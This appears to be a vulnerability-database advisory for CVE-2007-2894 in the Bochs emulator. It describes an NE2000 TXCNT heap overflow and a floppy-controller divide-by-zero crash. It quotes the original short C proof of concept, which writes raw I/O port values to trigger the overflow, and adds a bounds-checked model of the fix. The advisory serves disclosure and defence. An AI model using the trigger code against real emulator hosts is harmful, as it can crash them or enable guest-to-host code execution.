Bochs NE2000 RX Frame Heap Overflow and Floppy Controller Denial of Service Vulnerability

Vulnerability ID: 1113066    Vulnerability type: boundary condition error
Published: 2007-05-31    Updated: 2007-06-12
CVE: CVE-2007-2894    CNNVD-ID: CNNVD-200705-514
Platform: Linux    CVSS score: 2.1
|Vulnerability sources
https://www.exploit-db.com/exploits/30110
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-514
|Vulnerability details
Bochs is an open-source, portable IA-32 (x86) PC emulator written in C++. The Bochs emulator's implementation contains multiple vulnerabilities that a remote or local attacker could exploit to take control of a user's machine. The emulated NE2000 device in Bochs does not check whether the value in the TXCNT register exceeds the memory available in the device; this can cause a heap overflow and allow an attacker to execute arbitrary instructions with the privileges of the Bochs process. A successful attack, however, requires that the attacker already has the privileges needed to control the TXCNT register. In addition, the emulated floppy disk controller in Bochs may use 0 as a divisor, crashing the Bochs process.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/24246/info

Bochs is prone to a heap-based buffer-overflow issue and a denial-of-service issue. The buffer-overflow issue occurs because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. The denial-of-service vulnerability is caused by a divide-by-zero operation.

A local attacker can exploit these issues to execute arbitrary code in the context of the affected application or to cause denial-of-service conditions. Failed exploit attempts of the buffer-overflow vulnerability will also result in denial-of-service conditions. 

#include <sys/io.h>

/* Proof of concept from the original advisory: it programs the emulated
 * NE2000's I/O ports directly. iopl(3) raises the I/O privilege level so
 * the process may issue raw port writes (requires root on Linux). */
int main(int argc, char **argv) {
    iopl(3);
    outw(0x5292, 0x24c);
    outw(0xffff, 0x245);   /* (a) <- TXCNT is inserted here */
    outw(0x1ffb, 0x24e);
    outb(0x76, 0x241);
    outb(0x7b, 0x240);
    outw(0x79c4, 0x247);
    outw(0x59e6, 0x240);
    return 0;
}

(a) <- TXCNT is inserted here.
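As an added illustration of the missing bounds check described above (not Bochs's own code and not part of the original advisory), here is a simplified C model of an emulated NE2000 transmit path in which the guest-controlled TXCNT is validated against the remaining device memory and the destination frame buffer before anything is copied. The device memory size, page size and all function names are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical, simplified model of an emulated NE2000 (not Bochs's code):
 * the guest programs a transmit start page (TPSR) and a byte count (TXCNT),
 * and the emulator copies that many bytes out of the card's buffer memory. */
#define NE2K_MEM_SIZE  (32 * 1024)   /* assumed size of emulated card memory */
#define NE2K_PAGE_SIZE 256           /* assumed NE2000 page granularity */

struct ne2k_model {
    uint8_t mem[NE2K_MEM_SIZE];
};

/* Hardened transmit: validate the guest-controlled range before copying.
 * The advisory's bug class is exactly the absence of these two checks:
 * a TXCNT larger than the memory left after the start page reads past
 * dev->mem, and one larger than the frame buffer overflows it on the heap. */
int ne2k_tx_checked(const struct ne2k_model *dev, uint8_t tpsr,
                    uint16_t txcnt, uint8_t *frame, size_t frame_len)
{
    size_t start = (size_t)tpsr * NE2K_PAGE_SIZE;
    if (start >= NE2K_MEM_SIZE || txcnt > NE2K_MEM_SIZE - start)
        return -1;   /* source range would leave device memory */
    if (txcnt > frame_len)
        return -1;   /* destination frame buffer too small */
    memcpy(frame, dev->mem + start, txcnt);
    return (int)txcnt;
}

/* Driver over a constructed device image (memory filled with 0xAB).
 * Returns the ne2k_tx_checked() result for the given TPSR/TXCNT pair. */
int demo_tx(uint8_t tpsr, uint16_t txcnt)
{
    static struct ne2k_model dev;
    uint8_t frame[1514];             /* maximum Ethernet frame size */
    memset(dev.mem, 0xAB, sizeof dev.mem);
    return ne2k_tx_checked(&dev, tpsr, txcnt, frame, sizeof frame);
}

int main(void)
{
    printf("in-range  TXCNT=64     -> %d\n", demo_tx(0x40, 64));
    printf("too large TXCNT=0xffff -> %d\n", demo_tx(0x00, 0xffff));
    return 0;
}
```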
|References

Source: VUPEN
Name: ADV-2007-1936
Link: http://www.frsirt.com/english/advisories/2007/1936
Source: OSVDB
Name: 42119
Link: http://osvdb.org/42119
Source: XF
Name: bochs-floppy-disk-dos(34513)
Link: http://xforce.iss.net/xforce/xfdb/34513
Source: BID
Name: 24246
Link: http://www.securityfocus.com/bid/24246
Source: MISC
Link: http://taviso.decsystem.org/virtsec.pdf
Source: GENTOO
Name: GLSA-200711-21
Link: http://security.gentoo.org/glsa/glsa-200711-21.xml
Source: SECUNIA
Name: 27715
Link: http://secunia.com/advisories/27715
Source: SECUNIA
Name: 25470
Link: http://secunia.com/advisories/25470
Source: bugs.gentoo.org
Link: http://bugs.gentoo.org/show_bug.cgi?id=188148